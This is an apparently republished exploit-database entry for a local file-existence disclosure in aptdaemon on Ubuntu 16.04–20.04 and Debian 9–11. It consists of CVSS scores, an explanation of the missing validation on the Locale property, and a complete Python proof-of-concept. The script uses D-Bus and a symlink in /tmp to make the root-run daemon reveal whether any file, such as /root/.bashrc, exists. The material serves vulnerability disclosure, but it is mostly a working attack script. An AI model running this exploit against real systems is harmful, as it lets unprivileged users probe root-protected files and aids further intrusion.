aptdaemon File Existence Disclosure
2020-10-30 03:45:43 Author: cxsecurity.com(查看原文) 阅读量:110 收藏

aptdaemon File Existence Disclosure

CVSS Base Score: 4.9/10

Impact Subscore: 6.9/10

Exploitability Subscore: 3.9/10

Exploit range: Local

Attack complexity: Low

Authentication: No required

Confidentiality impact: Complete

Integrity impact: None

Availability impact: None

# Exploit Title: File Existence Disclosure in aptdaemon <= 1.1.1+bzr982-0ubuntu32.1 # Date: 2020-10-27 # Exploit Author: Vaisha Bernard (vbernard - at - eyecontrol.nl) # Vendor Homepage: https://wiki.debian.org/aptdaemon # Software Link: https://wiki.debian.org/aptdaemon # Version: <= 1.1.1+bzr982-0ubuntu32.1 # Tested on: Ubuntu 20.04 # #!/usr/bin/env python3 # # Ubuntu 16.04 - 20.04 # Debian 9 - 11 # aptdaemon < 1.1.1+bzr982-0ubuntu32.1 # Sensitive Information Disclosure # # Reference: https://www.eyecontrol.nl/blog/the-story-of-3-cves-in-ubuntu-desktop.html # # There is no input validation on the Locale property in an # apt transaction. An unprivileged user can supply a full path # to a writable directory, which lets aptd read a file as root. # Having a symlink in place results in an error message if the # file exists, and no error otherwise. This way an unprivileged # user can check for the existence of any files on the system # as root. # # This is a similar type of bug as CVE-2015-1323. # # # $ ./test_file_exists.py /root/.bashrc # File Exists! # $ ./test_file_exists.py /root/.bashrca # File does not exist! # # import dbus import os import sys if len(sys.argv) != 2: print("Checks if file exists") print("Usage: %s <file>") sys.exit(0) FILE_TO_CHECK = sys.argv[1] bus = dbus.SystemBus() apt_dbus_object = bus.get_object("org.debian.apt", "/org/debian/apt") apt_dbus_interface = dbus.Interface(apt_dbus_object, "org.debian.apt") # just use any valid .deb file trans = apt_dbus_interface.InstallFile("/var/cache/apt/archives/dbus_1.12.14-1ubuntu2.1_amd64.deb", False) apt_trans_dbus_object = bus.get_object("org.debian.apt", trans) apt_trans_dbus_interface = dbus.Interface(apt_trans_dbus_object, "org.debian.apt.transaction") properties_manager = dbus.Interface(apt_trans_dbus_interface, 'org.freedesktop.DBus.Properties') os.mkdir("/tmp/a") os.mkdir("/tmp/a/LC_MESSAGES") os.symlink(FILE_TO_CHECK, "/tmp/a/LC_MESSAGES/aptdaemon.mo") try: properties_manager.Set("org.debian.apt.transaction", "Locale", "/tmp/a.") except: print("File Exists!") pass else: print("File does not exist!") os.unlink("/tmp/a/LC_MESSAGES/aptdaemon.mo") os.rmdir("/tmp/a/LC_MESSAGES") os.rmdir("/tmp/a")



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2020100189
如有侵权请联系:admin#unsafe.sh